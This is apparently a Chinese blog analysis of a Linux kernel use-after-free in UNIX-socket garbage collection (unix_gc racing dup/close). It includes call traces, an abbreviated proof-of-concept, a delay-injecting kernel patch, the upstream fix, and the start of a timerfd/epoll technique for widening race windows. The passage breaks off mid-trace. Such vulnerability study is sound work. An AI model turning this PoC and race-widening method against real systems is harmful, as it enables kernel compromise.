<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">recvmsg() -> __sys_recvmsg() -> ...</span><br><span class="line"> -> <span class="comment">// sock->ops->recvmsg</span></span><br><span class="line"> unix_stream_recvmsg()</span><br><span class="line"> unix_stream_read_generic()</span><br><span class="line"> last = skb = skb_peek(&sk->sk_receive_queue);<span class="comment">// 取 skb</span></span><br><span class="line"> scm_recv() <span class="comment">// 处理 fd</span></span><br><span class="line"> scm_detach_fds()</span><br><span class="line"> receive_fd_user() <span class="comment">// 接收 fd</span></span><br><span class="line"> ..</span><br><span class="line"> fd_install(new_fd, get_file(file));</span><br><span class="line"> __scm_destroy() <span class="comment">// 释放 skb 绑定的 fd 引用</span></span><br><span class="line"> fput()</span><br><span class="line"> fput_many()</span><br></pre></td></tr></table></figure>
<p><code>**struct sk_buff *skb</code>, <code>struct unix_sock *u</code>, <code>struct socket *sock</code>, <code>struct sock *sk</code> 和 <code>struct file *file</code> 之间的关系?**</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">socket</span> *<span class="title">sock</span> = &<span class="title">container_of</span>(<span class="title">file</span>-><span class="title">f_inode</span>, </span></span><br><span class="line"><span class="class"> <span class="title">struct</span> <span class="title">socket_alloc</span>, <span class="title">vfs_inode</span>)-><span class="title">socket</span></span></span><br><span class="line"><span class="class"><span class="title">struct</span> <span class="title">sock</span> *<span class="title">sk</span> = <span class="title">sock</span>-><span class="title">sk</span></span></span><br><span class="line"><span class="class"></span></span><br><span class="line"><span class="class"><span class="title">struct</span> <span class="title">unix_sock</span> *<span class="title">u</span> = (<span class="title">struct</span> <span class="title">unix_sock</span> *)<span class="title">sk</span></span></span><br><span class="line"><span class="class"></span></span><br><span class="line"><span class="class"><span class="title">struct</span> <span class="title">file</span> *<span class="title">file</span> = <span class="title">u</span>-><span class="title">sk</span>.<span class="title">sk_socket</span>-><span class="title">file</span></span></span><br><span class="line"><span class="class"></span></span><br><span class="line"><span class="class"><span class="title">struct</span> <span class="title">file</span> *<span class="title">file</span> = (*(<span class="title">struct</span> <span class="title">unix_skb_parms</span> *)&((<span class="title">skb</span>)-><span class="title">cb</span>)).<span class="title">fp</span>-><span class="title">fp</span>[<span class="title">i</span>]</span></span><br></pre></td></tr></table></figure>
<h3 id="unix-gc-做了什么?"><a href="#unix-gc-做了什么?" class="headerlink" title="unix_gc() 做了什么?"></a><code>unix_gc()</code> 做了什么?</h3><ul>
<li>遍历 <code>gc_inflight_list</code> 获取 <code>unix_sock</code> 对象<ul>
<li>把满足条件的 <code>unix_sock</code> 添加到 <code>gc_candidates</code></li>
<li>条件:<code>unix_sock</code> 的文件引用和 <code>skb</code> 引用值相同</li>
</ul>
</li>
<li>遍历 <code>gc_candidates</code><ul>
<li>把满足条件的 <code>skb</code> 添加到 <code>hitlist</code></li>
</ul>
</li>
<li>释放 <code>hitlist</code> 上的 <code>skb</code> 内存和与之绑定的 <code>struc file</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">unix_gc()</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sk_buff_head</span> <span class="title">hitlist</span>;</span></span><br><span class="line"> ...</span><br><span class="line"> list_for_each_entry_safe(u, next, &gc_inflight_list, link) {</span><br><span class="line"> total_refs = file_count(u->sk.sk_socket->file);</span><br><span class="line"> inflight_refs = atomic_long_read(&u->inflight);</span><br><span class="line"> <span class="keyword">if</span> (total_refs == inflight_refs) {</span><br><span class="line"> list_move_tail(&u->link, &gc_candidates);</span><br><span class="line"> }</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> skb_queue_head_init(&hitlist);</span><br><span class="line"> list_for_each_entry(u, &gc_candidates, link)</span><br><span class="line"> scan_children(&u->sk, inc_inflight, &hitlist);</span><br><span class="line"> scan_inflight(&u->sk, func, hitlist);</span><br><span class="line"> __skb_queue_tail(hitlist, skb);</span><br><span class="line"> ...</span><br><span class="line"> __skb_queue_purge(&hitlist);</span><br><span class="line"> kfree_skb(skb);</span><br></pre></td></tr></table></figure>
<p><strong>unix_gc() 中 file 和 skb 在哪里 free ?</strong> </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">unix_gc()</span><br><span class="line"> ...</span><br><span class="line"> skb_queue_head_init(&hitlist);</span><br><span class="line"> list_for_each_entry(u, &gc_candidates, link) <span class="comment">// 从gc_candidates取skb到hitlist</span></span><br><span class="line"> scan_children(&u->sk, inc_inflight, <span class="literal">NULL</span>);</span><br><span class="line"> scan_inflight(&u->sk, func, hitlist);</span><br><span class="line"> __skb_queue_tail(hitlist, skb);</span><br><span class="line"> ...</span><br><span class="line"> __skb_queue_purge(&hitlist); <span class="comment">// (4)</span></span><br><span class="line"> kfree_skb(skb);</span><br><span class="line"> ...</span><br><span class="line"> **skb->destructor() <span class="comment">// 在 sendmsg 设置</span></span><br><span class="line"> unix_destruct_scm()**</span><br><span class="line"> scm_destroy()</span><br><span class="line"> __scm_destroy()</span><br><span class="line"> **fput() <span class="comment">// 如果 f_count 是 1 则减到 0 然后释放 file**</span></span><br><span class="line"> kfree_skbmem()</span><br><span class="line"> **kmem_cache_free(.., skb) <span class="comment">// 释放 skb**</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// unix_destruct_scm 在 sendmsg 设置</span></span><br><span class="line">sendmsg()</span><br><span class="line"> __sys_sendmsg()</span><br><span class="line"> sock_sendmsg()</span><br><span class="line"> sock_sendmsg_nosec()</span><br><span class="line"> unix_stream_sendmsg() <span class="comment">// struct unix_stream_ops </span></span><br><span class="line"> skb = sock_alloc_send_pskb()</span><br><span class="line"> unix_scm_to_skb()</span><br><span class="line"> **skb->destructor = unix_destruct_scm;**</span><br></pre></td></tr></table></figure>
<h3 id="unix-gc-何时被调用?"><a href="#unix-gc-何时被调用?" class="headerlink" title="unix_gc() 何时被调用?"></a><code>unix_gc()</code> 何时被调用?</h3><ul>
<li><code>close()</code> 可以间接触发<ul>
<li>具体入口的 <code>syscall_exit_to_user_mode() - __fput()</code></li>
</ul>
</li>
<li><code>sendmsg()</code> 也可以触发但只在队列满的时候<ul>
<li><code>sendmsg() - wait_for_unix_gc()</code></li>
</ul>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// close() 一个 f_count 为 1 的文件时触发</span></span><br><span class="line"><span class="built_in">close</span>()</span><br><span class="line"> close_fd()</span><br><span class="line"> filp_close()</span><br><span class="line"> fput()</span><br><span class="line"> fput_many(file, <span class="number">1</span>);</span><br><span class="line"> atomic_long_sub_and_test(refs, &file->f_count) </span><br><span class="line"> init_task_work(&file->f_u.fu_rcuhead, ____fput)</span><br><span class="line"> task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)</span><br><span class="line">entry_SYSCALL_64 </span><br><span class="line"> do_syscall_64</span><br><span class="line"> syscall_exit_to_user_mode</span><br><span class="line"> ...</span><br><span class="line"> tracehook_notify_resume</span><br><span class="line"> task_work_run()</span><br><span class="line"> __fput() </span><br><span class="line"> sock_close() <span class="comment">// (struct file *) ->f_op->release()</span></span><br><span class="line"> __sock_release() </span><br><span class="line"> unix_release() <span class="comment">// (struct socket *) ->ops->release()</span></span><br><span class="line"> unix_release_sock() </span><br><span class="line"> **unix_gc()**</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 只有 inflight sockets 超过 UNIX_INFLIGHT_TRIGGER_GC(16000) 才会调用</span></span><br><span class="line">sendmsg()</span><br><span class="line"> ...</span><br><span class="line"> unix_stream_sendmsg()/unix_dgram_sendmsg()</span><br><span class="line"> wait_for_unix_gc()</span><br><span class="line"> <span class="keyword">if</span> (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)</span><br><span class="line"> **unix_gc();**</span><br></pre></td></tr></table></figure>
<h3 id="dup-的作用和实现原理?"><a href="#dup-的作用和实现原理?" class="headerlink" title="dup() 的作用和实现原理?"></a>dup() 的作用和实现原理?</h3><ul>
<li>根据 fd 从 fd table 中获取 <code>struct file *file</code></li>
<li>如果 <code>f_count</code> 不为 0 则 <code>file->f_count += 1</code></li>
<li>fd table 中新建一个条目指向 file</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">SYSCALL_DEFINE1(dup, <span class="keyword">unsigned</span> <span class="keyword">int</span>, fildes)</span><br><span class="line"> fget_raw()</span><br><span class="line"> __fget(fd, FMODE_PATH, <span class="number">1</span>)</span><br><span class="line"> __fget_files(current->files, fd, mask, refs)</span><br><span class="line"> file = files_lookup_fd_rcu(files, fd);<span class="comment">// 根据 fd 从 fd table 中获取 struct file *file</span></span><br><span class="line"> get_file_rcu_many(file, refs) </span><br><span class="line"> atomic_long_add_unless(&(x)->f_count, (cnt), <span class="number">0</span>) <span class="comment">// if not 0, file->f_count += 1</span></span><br><span class="line"> get_unused_fd_flags()</span><br><span class="line"> fd_install() <span class="comment">// fd table 中新建一个条目指向 file</span></span><br></pre></td></tr></table></figure>
<h3 id="close-的作用和实现原理?"><a href="#close-的作用和实现原理?" class="headerlink" title="close() 的作用和实现原理?"></a><code>close()</code> 的作用和实现原理?</h3><ul>
<li>使 fd 重新可用</li>
<li>把 fd table 中 fd 对应的条目删除(设置为 NULL)</li>
<li>fd table 中原来指向的 <code>struct file</code> 的 <code>f_count</code> 减 1,如果减到 0 则释放 struct file 的内存</li>
<li><code>close</code> 不一定会立马释放 <code>struct file</code>, 但是用户态不能再访问该 <code>fd</code>,比如<code>dup(fd)</code>,<code>read(fd)</code> ..</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">close</span>()</span><br><span class="line"> close_fd()</span><br><span class="line"> pick_file()</span><br><span class="line"> fdt = files_fdtable(files);</span><br><span class="line"> file = fdt->fd[fd];</span><br><span class="line"> **rcu_assign_pointer(fdt->fd[fd], <span class="literal">NULL</span>); <span class="comment">// fd table 中 fd 对应的条目删除</span></span><br><span class="line"> __put_unused_fd(files, fd); <span class="comment">// 使 fd 重新可用**</span></span><br><span class="line"> filp_close()</span><br><span class="line"> **fput()**</span><br><span class="line"> fput_many(file, <span class="number">1</span>); <span class="comment">// fd table 中原来指向的 struct file 的 f_count 减 1</span></span><br><span class="line"> atomic_long_sub_and_test(refs, &file->f_count)</span><br><span class="line"> **init_task_work(&file->f_u.fu_rcuhead, ____fput)**</span><br><span class="line"> task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)</span><br><span class="line"></span><br><span class="line">____fput()</span><br><span class="line"> __fput()</span><br><span class="line"> file_free()</span><br><span class="line"> file_free_rcu()</span><br><span class="line"> **kmem_cache_free(filp_cachep, f) <span class="comment">// 如果减到 0 则释放 struct file 的内存**</span></span><br></pre></td></tr></table></figure>
<h3 id="增加-kernel-delay-patch-的-poc-如何-work"><a href="#增加-kernel-delay-patch-的-poc-如何-work" class="headerlink" title="增加 kernel delay patch 的 poc 如何 work ?"></a>增加 kernel delay patch 的 poc 如何 work ?</h3><ul>
<li>line-27 将 pair[0] f_count +1 并添加到 <code>gc_inflight_list</code> 和 <code>sk_receive_queue</code></li>
<li>line-29 和 line-43 用于触发 <code>unix_gc()</code> 调用, 因为需要一个 <code>f_count</code> 为 1 的 <code>fd</code> 被 <code>close()</code></li>
<li>line-36 用于等待 <code>resurrect_fn()->dup()->__fget_files()</code> 调用进入 race window 拿到 <code>struct file</code> , 因为 line-37 会把 <code>pair[0]</code> 从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms</li>
<li>line-43 会在 <code>__fget_files()</code> 等待的期间执行 <code>unix_gc()</code> , 在执行到准备释放 skb 的代码时,会等待 line-11 的 dup() 完成。</li>
<li><code>dup()</code> 完成后执行到 line-16 的 <code>recvmsg()</code> ,内核会等待 line-43 触发的 <code>unix_gc()</code> 完成 skb 的释放</li>
<li><code>unix_gc()</code> 完成后,<code>recvmsg()</code> 继续执行拿到被释放的 skb,UAF</li>
</ul>
<p>省略版 <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2247" target="_blank" rel="noopener">POC</a>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="function"><span class="keyword">void</span> <span class="title">send_fd</span><span class="params">(<span class="keyword">int</span> sock, <span class="keyword">int</span> fd)</span> </span>{</span><br><span class="line"><span class="number">2</span> ...</span><br><span class="line"><span class="number">3</span> sendmsg(sock, &msg, <span class="number">0</span>);</span><br><span class="line"><span class="number">4</span> }</span><br><span class="line"><span class="number">5</span></span><br><span class="line"><span class="number">6</span> <span class="keyword">int</span> resurrect_fd = <span class="number">-1</span>;</span><br><span class="line"><span class="number">7</span> <span class="keyword">int</span> resurrected_fd = <span class="number">-1</span>;</span><br><span class="line"><span class="number">8</span></span><br><span class="line"><span class="number">9</span> <span class="function"><span class="keyword">void</span> *<span class="title">resurrect_fn</span><span class="params">(<span class="keyword">void</span> *arg)</span> </span>{</span><br><span class="line"><span class="number">10</span> prctl(PR_SET_NAME, <span class="string">"SLOW-ME"</span>); <span class="comment">// tell kernel to inject mdelay()</span></span><br><span class="line"><span class="number">11</span> resurrected_fd = dup(resurrect_fd);</span><br><span class="line"><span class="number">12</span> prctl(PR_SET_NAME, <span class="string">"resurrect"</span>);</span><br><span class="line"><span class="number">13</span></span><br><span class="line"><span class="number">14</span> prctl(PR_SET_NAME, <span class="string">"SLOW-RECV"</span>);</span><br><span class="line"><span class="number">15</span> ...</span><br><span class="line"><span class="number">16</span> <span class="keyword">int</span> recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);</span><br><span class="line"><span class="number">17</span> prctl(PR_SET_NAME, <span class="string">"resurrect"</span>);</span><br><span class="line"><span class="number">18</span></span><br><span class="line"><span class="number">19</span> <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line"><span class="number">20</span> }</span><br><span class="line"><span class="number">21</span></span><br><span class="line"><span class="number">22</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"><span class="number">23</span> <span class="comment">/* create socketpair */</span></span><br><span class="line"><span class="number">24</span> <span class="keyword">int</span> pair[<span class="number">2</span>];</span><br><span class="line"><span class="number">25</span> socketpair(AF_UNIX, SOCK_STREAM, <span class="number">0</span>, pair);</span><br><span class="line"><span class="number">26</span></span><br><span class="line"><span class="number">27</span> send_fd(pair[<span class="number">1</span>], pair[<span class="number">0</span>]);</span><br><span class="line"><span class="number">28</span></span><br><span class="line"><span class="number">29</span> <span class="keyword">int</span> trigger_sock = socket(AF_UNIX, SOCK_DGRAM, <span class="number">0</span>);</span><br><span class="line"><span class="number">30</span></span><br><span class="line"><span class="number">31</span> resurrect_fd = pair[<span class="number">0</span>];</span><br><span class="line"><span class="number">32</span></span><br><span class="line"><span class="number">33</span> <span class="keyword">pthread_t</span> resurrect_thread;</span><br><span class="line"><span class="number">34</span> pthread_create(&resurrect_thread, <span class="literal">NULL</span>, resurrect_fn, <span class="literal">NULL</span>);</span><br><span class="line"><span class="number">35</span></span><br><span class="line"><span class="number">36</span> usleep(<span class="number">100000</span>); <span class="comment">/* wait for fget_raw() to see pointer */</span></span><br><span class="line"><span class="number">37</span> <span class="built_in">close</span>(pair[<span class="number">0</span>]);</span><br><span class="line"><span class="number">38</span></span><br><span class="line"><span class="number">39</span> <span class="comment">/*</span></span><br><span class="line"><span class="comment">40 * trigger unix GC; has to read file_count() before file inc</span></span><br><span class="line"><span class="comment">41 * but do hitlist kill after file inc</span></span><br><span class="line"><span class="comment">42 */</span></span><br><span class="line"><span class="number">43</span> <span class="built_in">close</span>(trigger_sock);</span><br><span class="line"><span class="number">44</span></span><br><span class="line"><span class="number">45</span> <span class="comment">/* make sure dup() has really finished */</span></span><br><span class="line"><span class="number">46</span> pthread_join(resurrect_thread, <span class="literal">NULL</span>);</span><br><span class="line"><span class="number">47</span></span><br><span class="line"><span class="number">48</span> }</span><br></pre></td></tr></table></figure>
<p><a href="https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=531225" target="_blank" rel="noopener">kernel patch</a> 增加三个 mdelay </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">@@ <span class="number">-850</span>,<span class="number">6</span> +<span class="number">852</span>,<span class="number">13</span> @@ <span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">file</span> *__<span class="title">fget_files</span>(<span class="title">struct</span> <span class="title">files_struct</span> *<span class="title">files</span>, <span class="title">unsigned</span> <span class="title">int</span> <span class="title">fd</span>,</span></span><br><span class="line"><span class="class"> <span class="title">loop</span>:</span></span><br><span class="line"> file = files_lookup_fd_rcu(files, fd);</span><br><span class="line"> <span class="keyword">if</span> (file) {</span><br><span class="line">+ <span class="keyword">if</span> (<span class="built_in">strcmp</span>(current->comm, <span class="string">"SLOW-ME"</span>) == <span class="number">0</span>) {</span><br><span class="line">+ pr_warn(<span class="string">"slowing lookup of fd %u to file 0x%lx with %ld refs\n"</span>,</span><br><span class="line">+ fd, (<span class="keyword">unsigned</span> <span class="keyword">long</span>)file, file_count(file));</span><br><span class="line">**+ mdelay(<span class="number">500</span>);**</span><br><span class="line">+ pr_warn(<span class="string">"slowed lookup of fd %u to file 0x%lx with %ld refs\n"</span>,</span><br><span class="line">+ fd, (<span class="keyword">unsigned</span> <span class="keyword">long</span>)file, file_count(file));</span><br><span class="line">+ }</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">@@ <span class="number">-2631</span>,<span class="number">6</span> +<span class="number">2633</span>,<span class="number">12</span> @@ <span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">unix_stream_read_generic</span><span class="params">(struct unix_stream_read_state *state,</span></span></span><br><span class="line"><span class="function"><span class="params"> last = skb = skb_peek(&sk->sk_receive_queue);</span></span></span><br><span class="line"><span class="function"><span class="params"> last_len = last ? last->len : <span class="number">0</span>;</span></span></span><br><span class="line"><span class="function"><span class="params"> </span></span></span><br><span class="line"><span class="function"><span class="params">+ <span class="keyword">if</span> (<span class="built_in">strcmp</span>(current->comm, <span class="string">"SLOW-RECV"</span>) == <span class="number">0</span>) {</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"recvmsg: delaying stream receive\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ mdelay(<span class="number">500</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"recvmsg: delayed stream receive\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ }</span></span></span><br><span class="line"><span class="function"><span class="params">+</span></span></span><br><span class="line"><span class="function"><span class="params">...</span></span></span><br><span class="line"><span class="function"><span class="params">@@ <span class="number">-210</span>,<span class="number">8</span> +<span class="number">212</span>,<span class="number">11</span> @@ <span class="keyword">void</span> unix_gc(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"><span class="params">...</span></span></span><br><span class="line"><span class="function"><span class="params"> skb_queue_head_init(&hitlist);</span></span></span><br><span class="line"><span class="function"><span class="params">+ <span class="keyword">if</span> (<span class="built_in">strcmp</span>(current->comm, <span class="string">"resurrect"</span>) == <span class="number">0</span>) {</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"unix: delaying hitlist setup\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ mdelay(<span class="number">500</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ pr_warn(<span class="string">"unix: hitlist setup delay done\n"</span>);</span></span></span><br><span class="line"><span class="function"><span class="params">+ }</span></span></span><br><span class="line"><span class="function"><span class="params"> list_for_each_entry(u, &gc_candidates, link)</span></span></span><br><span class="line"><span class="function"><span class="params"> scan_children(&u->sk, inc_inflight, &hitlist);</span></span></span><br></pre></td></tr></table></figure>
<h3 id="fixed-patch-如何-work"><a href="#fixed-patch-如何-work" class="headerlink" title="fixed patch 如何 work ?"></a>fixed <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=054aa8d439b9185d4f5eb9a90282d1ce74772969" target="_blank" rel="noopener">patch</a> 如何 work ?</h3><ul>
<li>补丁效果:在 race window 期间,如果 fd 对应的 <code>struct file</code> 已经从 fd table 移除,则回退对 <code>f_count</code> 的操作,如果发现回退后变为 0 则直接释放 <code>struct file</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/fs/file.c b/fs/file.c</span><br><span class="line">index <span class="number">8627</span>dacfc4246..ad4a8bf3cf109 <span class="number">100644</span></span><br><span class="line">--- a/fs/file.c</span><br><span class="line">+++ b/fs/file.c</span><br><span class="line">@@ <span class="number">-858</span>,<span class="number">6</span> +<span class="number">858</span>,<span class="number">10</span> @@ loop:</span><br><span class="line"> file = <span class="literal">NULL</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (!get_file_rcu_many(file, refs))</span><br><span class="line"> <span class="keyword">goto</span> loop;</span><br><span class="line">+ <span class="keyword">else</span> <span class="keyword">if</span> (files_lookup_fd_raw(files, fd) != file) {</span><br><span class="line">+ fput_many(file, refs);</span><br><span class="line">+ <span class="keyword">goto</span> loop;</span><br><span class="line">+ }</span><br><span class="line"> }</span><br><span class="line"> rcu_read_unlock();</span><br></pre></td></tr></table></figure>
<h2 id="Part-3"><a href="#Part-3" class="headerlink" title="Part.3"></a>Part.3</h2><h3 id="如何利用-hrtimer-扩大-race-成功率?"><a href="#如何利用-hrtimer-扩大-race-成功率?" class="headerlink" title="如何利用 hrtimer 扩大 race 成功率?"></a>如何利用 hrtimer 扩大 race 成功率?</h3><ul>
<li><code>timerfd_create</code> + <code>timerfd_settime</code> 可以在指定时间(纳秒)后触发 timer interrupt</li>
<li>timer interrupt handler 会调用 <code>__wake_up_common</code> 遍历 wait queue 并执行回调函数。这意味着 wait queue 越长,处在 interrupt context 的时间越长</li>
<li>利用这一点可以让进程在 race window 中被中断,然后在另一个 CPU 上运行需要与之 race 的进程</li>
</ul>
<p><strong>wait queue item 在哪里添加和读取 ?</strong></p>
<ul>
<li>每一个 <code>EPOLL_CTL_ADD</code> 会在 timer_fd 的 wait queue 上添加一个执行 <code>ep_poll_callback</code> 的 entry</li>
<li>在 <code>timerfd_triggered</code> 中 从 timer_fd 的 wait queue 中取出 entry</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j]</span></span><br><span class="line"></span><br><span class="line">do_epoll_ctl() <span class="comment">// 在 ep_ptable_queue_proc 中添加 wait_queue_enty</span></span><br><span class="line"> ep_insert(struct eventpoll *ep, ..</span><br><span class="line"> struct ep_pqueue epq;</span><br><span class="line"> init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); <span class="comment">// epq.pt._qproc = **ep_ptable_queue_proc**</span></span><br><span class="line"> ep_item_poll(epi, &epq.pt, <span class="number">1</span>);</span><br><span class="line"> vfs_poll</span><br><span class="line"> timerfd_poll <span class="comment">// struct file_operations timerfd_fops.poll</span></span><br><span class="line"> struct timerfd_ctx *ctx = file->private_data;</span><br><span class="line"> poll_wait(file, &ctx->wqh, wait); <span class="comment">// &ctx->wqh: whead, wait: &epq.pt, (include/linux/poll.h)</span></span><br><span class="line"> **ep_ptable_queue_proc**(struct file *file, <span class="keyword">wait_queue_head_t</span> *whead, poll_table *pt)</span><br><span class="line"> struct epitem *epi = ep_item_from_epqueue(pt);</span><br><span class="line"> struct eppoll_entry *pwq;</span><br><span class="line"> ...</span><br><span class="line"> pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);</span><br><span class="line"> ...</span><br><span class="line"> **init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);**</span><br><span class="line"> ...</span><br><span class="line"> 